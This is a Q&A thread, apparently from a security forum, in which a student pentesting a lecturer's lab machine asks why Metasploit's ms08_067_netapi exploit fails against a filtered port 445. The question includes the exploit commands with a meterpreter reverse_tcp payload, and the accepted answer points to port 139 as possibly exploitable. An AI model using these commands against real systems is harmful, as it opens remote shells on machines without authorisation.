Exploiting through a filtered port

  • I'm doing some pentesting against a machine the lecturer set up in the lab. NMAP shows port 445 to be filtered and Nessus confirms the ms08_067 vulnerability is present on that machine.

    I tried running Metasploit against it the normal way:

    use exlpoit/windows/smb/ms08_067_netapi
    set RHOST TARGET_IP
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST MY_IP
    exploit
    

    It tells me:

    [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)

    I'm guessing the exploit is failing because port 445 is filtered. The thing that has me puzzled is that Nessus can apparently check that the vulnerability is present. Since Nessus can do that through the filtered port, is there a way I can launch the exploit through a filtered port? Are there any Metasploit settings that need to be arranged?

    I assume 192.168.2.2 is the TARGET_IP?

  • GdD

    GdD Correct answer

    7 years ago

    You have contradictory information: nmap says the port is filtered but nessus says that the vulnerability is present on the system. They cannot both be true, one of these must be wrong. Given that metasploit is unable to connect it is likely that nessus is reporting incorrectly, or is basing the vulnerability report on information gleaned from other open ports. If you look at tenable's page on that advisory you will see that nessus can test for it using port 139 or port 445, so 139 is probably open, and may be exploitable.

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM